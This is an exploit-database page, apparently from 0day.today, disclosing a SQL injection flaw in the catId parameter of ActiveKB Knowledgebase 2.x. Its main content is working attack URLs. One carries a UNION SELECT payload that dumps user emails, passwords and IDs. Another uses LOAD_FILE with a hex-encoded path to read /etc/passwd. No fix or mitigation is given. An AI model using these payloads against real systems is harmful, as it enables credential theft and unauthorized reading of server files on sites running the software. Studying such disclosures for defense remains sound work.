[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ActiveKB Knowledgebase 2.? (catId) Remote SQL Injection Vulnerability

Author
Luna-Tic/XTErner
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2172
Category
web applications
Date add
25-09-2007
Platform
unsorted
=====================================================================
ActiveKB Knowledgebase 2.? (catId) Remote SQL Injection Vulnerability
=====================================================================



 ActiveKB NX 2.? ( Powered by ActiveKB Knowledgebase Software)  (index.php) SQL Injection

                              Discovered by Luna-Tic and XTErner 19 Years Ukrainian Hackers 

Vendor:www.interspire.com/activekb/

License:sharewere

Exploit:/kb/index.php?ToDo=browse&catId=[SQL CODE]
http://www.xxx.net/kb/index.html?ToDo=browse&catId=-20+union+select+1,concat(email,0x3a,password,0x3a,userid),3,4,5,6,7+from+user--
https://www.xxx.com/faq/index.php?ToDo=browse&catId=-10+union+select+1,LOAD_FILE(0x2f6574632f706173737764),3,4,5,6,7+members/*



#  0day.today [2024-12-24]  #